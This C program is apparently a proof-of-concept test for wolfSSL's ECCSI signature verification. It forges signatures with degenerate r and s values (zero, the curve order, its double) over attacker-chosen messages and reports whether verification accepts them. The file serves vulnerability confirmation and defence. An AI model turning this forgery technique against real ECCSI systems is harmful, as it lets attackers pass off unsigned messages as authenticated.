#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wolfssl/options.h>
#include <wolfssl/wolfcrypt/eccsi.h>
#include <wolfssl/wolfcrypt/hash.h>
#include <wolfssl/wolfcrypt/random.h>

#define CURVE_SIZE 32
#define SIG_SIZE (CURVE_SIZE * 4 + 1) /* 129 for P-256 */

/*
 * Write `label` to stdout, then each of the `len` bytes of `data` as two
 * lowercase hex digits (no separators), then a newline.
 * `data` is not read when `len` is 0.
 */
static void print_hex(const char* label, const byte* data, word32 len)
{
    word32 idx = 0;

    fputs(label, stdout);
    while (idx < len) {
        printf("%02x", (unsigned int)data[idx]);
        ++idx;
    }
    fputc('\n', stdout);
}

/*
 * Store a big-endian scalar into the `sz`-byte field starting at sig[offset].
 *
 * The field is always zeroed first. A value shorter than the field is
 * right-aligned (padded with leading zero bytes). A value longer than the
 * field keeps only its least-significant `sz` bytes. A NULL or zero-length
 * value leaves the field all zero.
 */
static void set_scalar(byte* sig, word32 offset, word32 sz, const byte* val, word32 val_len)
{
    byte* field = sig + offset;

    memset(field, 0, sz);
    if (val == NULL || val_len == 0) {
        return;
    }

    if (val_len > sz) {
        /* Too wide for the field: drop the most-significant excess bytes. */
        memcpy(field, val + (val_len - sz), sz);
        return;
    }

    memcpy(field + (sz - val_len), val, val_len);
}

int main(int argc, char* argv[])
{
    int ret;
    int overall_verdict = 1; /* confirmed = 0 if any forgery passes */
    EccsiKey kms_key, pub_key;
    WC_RNG rng;
    mp_int ssk;
    ecc_point* pvt = NULL;
    byte id[] = "test@wolfssl.com";
    word32 idSz = (word32)strlen((char*)id);
    byte msg[] = "FORGED: any text the attacker wants the victim to authenticate";
    word32 msgSz = (word32)sizeof(msg) - 1;
    byte sig[SIG_SIZE];
    word32 sigSz = sizeof(sig);
    byte hash[WC_MAX_DIGEST_SIZE];
    byte hashSz;
    int verified;
    byte q_bytes[CURVE_SIZE];
    word32 q_len = 0;

    printf("=== ECCSI Universal Signature Forgery Test ===\n");
    printf("Message: %s\n", msg);
    printf("Identity: %s\n", id);
    printf("\n");

    ret = wc_InitRng(&rng);
    if (ret != 0) {
        printf("wc_InitRng failed: %d\n", ret);
        return 1;
    }

    ret = wc_InitEccsiKey_ex(&kms_key, CURVE_SIZE, ECC_SECP256R1, NULL, INVALID_DEVID);
    if (ret != 0) {
        printf("wc_InitEccsiKey_ex failed: %d\n", ret);
        return 1;
    }

    ret = wc_MakeEccsiKey(&kms_key, &rng);
    if (ret != 0) {
        printf("wc_MakeEccsiKey failed: %d\n", ret);
        return 1;
    }

    ret = mp_init(&ssk);
    if (ret != 0) {
        printf("mp_init failed: %d\n", ret);
        return 1;
    }

    pvt = wc_ecc_new_point_h(NULL);
    if (pvt == NULL) {
        printf("wc_ecc_new_point_h failed\n");
        return 1;
    }

    ret = wc_MakeEccsiPair(&kms_key, &rng, WC_HASH_TYPE_SHA256, id, idSz, &ssk, pvt);
    if (ret != 0) {
        printf("wc_MakeEccsiPair failed: %d\n", ret);
        return 1;
    }

    ret = wc_HashEccsiId(&kms_key, WC_HASH_TYPE_SHA256, id, idSz, pvt, hash, &hashSz);
    if (ret != 0) {
        printf("wc_HashEccsiId failed: %d\n", ret);
        return 1;
    }

    ret = wc_SetEccsiHash(&kms_key, hash, hashSz);
    if (ret != 0) {
        printf("wc_SetEccsiHash failed: %d\n", ret);
        return 1;
    }

    ret = wc_SetEccsiPair(&kms_key, &ssk, pvt);
    if (ret != 0) {
        printf("wc_SetEccsiPair failed: %d\n", ret);
        return 1;
    }

    /* Sign a real message to get a valid signature structure */
    ret = wc_SignEccsiHash(&kms_key, &rng, WC_HASH_TYPE_SHA256, msg, msgSz, sig, &sigSz);
    if (ret != 0) {
        printf("wc_SignEccsiHash failed: %d\n", ret);
        return 1;
    }
    printf("Real signature generated, size=%u\n", sigSz);
    print_hex("Real sig r: ", sig, CURVE_SIZE);
    print_hex("Real sig s: ", sig + CURVE_SIZE, CURVE_SIZE);
    printf("\n");

    /* Get the curve order q from the key params */
    ret = mp_to_unsigned_bin_len(&kms_key.params.order, q_bytes, CURVE_SIZE);
    if (ret != 0) {
        printf("mp_to_unsigned_bin_len failed: %d\n", ret);
        return 1;
    }
    print_hex("Curve order q: ", q_bytes, CURVE_SIZE);
    printf("\n");

    /* Prepare public key for verification */
    ret = wc_InitEccsiKey_ex(&pub_key, CURVE_SIZE, ECC_SECP256R1, NULL, INVALID_DEVID);
    if (ret != 0) {
        printf("wc_InitEccsiKey_ex (pub) failed: %d\n", ret);
        return 1;
    }

    /* Export and import public key */
    byte pubData[CURVE_SIZE * 2 + 1];
    word32 pubSz = sizeof(pubData);
    ret = wc_ExportEccsiPublicKey(&kms_key, pubData, &pubSz, 1);
    if (ret != 0) {
        printf("wc_ExportEccsiPublicKey failed: %d\n", ret);
        return 1;
    }
    ret = wc_ImportEccsiPublicKey(&pub_key, pubData, pubSz, 1);
    if (ret != 0) {
        printf("wc_ImportEccsiPublicKey failed: %d\n", ret);
        return 1;
    }

    ret = wc_SetEccsiHash(&pub_key, hash, hashSz);
    if (ret != 0) {
        printf("wc_SetEccsiHash (pub) failed: %d\n", ret);
        return 1;
    }

    /* Test cases for forged signatures */
    struct {
        const char* name;
        byte r_val[CURVE_SIZE];
        byte s_val[CURVE_SIZE];
        int is_zero_r;
        int is_zero_s;
        int is_order_r;
        int is_order_s;
    } tests[] = {
        {"r=0, s=0", {0}, {0}, 1, 1, 0, 0},
        {"r=q, s=q", {0}, {0}, 0, 0, 1, 1},
        {"r=q, s=0", {0}, {0}, 0, 1, 1, 0},
        {"r=q, s=1", {0}, {0}, 0, 0, 1, 0},
        {"r=2q, s=2q", {0}, {0}, 0, 0, 0, 0},
    };
    int num_tests = sizeof(tests) / sizeof(tests[0]);

    /* Fill in the actual order values */
    for (int i = 0; i < num_tests; i++) {
        if (tests[i].is_order_r) {
            memcpy(tests[i].r_val, q_bytes, CURVE_SIZE);
        }
        if (tests[i].is_order_s) {
            memcpy(tests[i].s_val, q_bytes, CURVE_SIZE);
        }
        if (strcmp(tests[i].name, "r=2q, s=2q") == 0) {
            /* For r=2q, we need to double the order value (with carry) */
            int carry = 0;
            for (int j = CURVE_SIZE - 1; j >= 0; j--) {
                int sum = q_bytes[j] * 2 + carry;
                tests[i].r_val[j] = (byte)(sum & 0xFF);
                carry = sum >> 8;
            }
            memcpy(tests[i].s_val, tests[i].r_val, CURVE_SIZE);
        }
        if (strcmp(tests[i].name, "r=q, s=1") == 0) {
            memset(tests[i].s_val, 0, CURVE_SIZE);
            tests[i].s_val[CURVE_SIZE - 1] = 1;
        }
    }

    printf("--- Testing forged signatures ---\n");
    for (int i = 0; i < num_tests; i++) {
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);

        /* Replace r and s, keep PVT from real signature */
        set_scalar(forged, 0, CURVE_SIZE, tests[i].r_val, CURVE_SIZE);
        set_scalar(forged, CURVE_SIZE, CURVE_SIZE, tests[i].s_val, CURVE_SIZE);

        printf("\nTest: %s\n", tests[i].name);
        print_hex("  Forged r: ", forged, CURVE_SIZE);
        print_hex("  Forged s: ", forged + CURVE_SIZE, CURVE_SIZE);

        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg, msgSz,
                                 forged, SIG_SIZE, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);

        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED ***\n");
            overall_verdict = 0;
        } else {
            printf("  Forgery rejected (expected)\n");
        }
    }

    /* Also try r=0, s=0 with a different message */
    byte msg2[] = "Completely different message that was never signed";
    word32 msg2Sz = (word32)sizeof(msg2) - 1;
    {
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);
        memset(forged, 0, CURVE_SIZE * 2); /* r=0, s=0 */

        printf("\nTest: r=0, s=0 with DIFFERENT message\n");
        print_hex("  Forged r: ", forged, CURVE_SIZE);
        print_hex("  Forged s: ", forged + CURVE_SIZE, CURVE_SIZE);

        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg2, msg2Sz,
                                 forged, SIG_SIZE, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);

        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED ***\n");
            overall_verdict = 0;
        } else {
            printf("  Forgery rejected (expected)\n");
        }
    }

    /* Cleanup */
    wc_ecc_del_point_h(pvt, NULL);
    mp_clear(&ssk);
    wc_FreeEccsiKey(&kms_key);
    wc_FreeEccsiKey(&pub_key);
    wc_FreeRng(&rng);

    printf("\n=== Overall verdict: %s ===\n",
           overall_verdict == 0 ? "CONFIRMED (forgery accepted)" : "NOT CONFIRMED");

    return overall_verdict;
}
